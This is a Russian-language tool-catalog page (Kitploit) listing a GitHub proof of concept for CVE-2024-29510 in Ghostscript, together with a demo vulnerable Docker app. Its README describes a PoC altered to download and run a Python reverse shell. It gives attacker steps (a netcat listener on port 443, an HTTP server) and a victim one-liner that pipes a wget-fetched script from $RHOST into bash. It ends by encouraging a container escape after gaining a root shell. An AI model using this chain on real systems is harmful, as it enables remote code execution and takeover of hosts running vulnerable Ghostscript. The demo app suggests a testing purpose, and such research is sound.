Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-29510 — POC-код для CVE-2024-29510 и демонстрационное VulnApp | Kitploit
Инструменты/GitHubGitHub/swsmith2391/cve-2024-29510
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийРазработка Полезной НагрузкиПобег из КонтейнераЭксплуатация Бинарных Файлов
GitHubswsmith2391/cve-2024-29510

CVE-2024-29510

POC-код для CVE-2024-29510 и демонстрационное VulnApp

Репозиторий
1162 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Оригинальное исследование и код PoC: https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/

ПРИМЕЧАНИЕ: Я не вносил никаких изменений в PoC, кроме выполняемой команды. Полная заслуга принадлежит Томасу Ринсме из Codean Labs за их потрясающее исследование и PoC.

Локальный сценарий

  1. Обёрнут в скрипт-загрузчик для загрузки и выполнения скрипта проверки, чтобы узнать, уязвим ли хост.
  2. PoC изменён для загрузки и выполнения обратного шелла Python3.
  3. Загрузчик и обратный шелл загружаются и выполняются через STDIN.
  4. PoC оставляет артефакт в /tmp со случайным именем.

На атакующем хосте:

  1. Используя pwncat-cs или netcat, создайте слушатель на порт 443.
  2. Перейдите в директорию эксплойта.
  3. python3 -m http.server 80

На хосте жертвы (Ubuntu 23.10 с Ghostscript 10.01.2):

  1. Откройте терминал и выполните: export RHOST=''; wget -q http://$RHOST/run -O - | bash &

Удаленный сценарий (VulnApp)

  1. Соберите VulnApp с помощью: 'docker build -t cve-2024-29510-demo:latest .' (Требуется копия https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10021/ghostscript-10.02.1.tar.gz в директории Dockerfile)
  2. Запустите VulnApp с помощью: 'docker run --rm -p 5000:5000 cve-2024-29510-demo:latest'
  3. Попробуйте преобразовать good.ps для проверки функциональности. Должен вернуться PDF с линиями, рисующими стрелку, например '>'
  4. Настройте веб-сервер на порту 80, размещающий shell.html, например 'python3 -m http.server 80'
  5. Используя pwncat-cs или netcat, создайте слушатель на порт 443.
  • Загрузите bad.eps, VulnApp зависнет, и слушатель должен поймать обратный шелл для контейнера (работает от root).
  • Сбегите из контейнера!
  • Скачать инструмент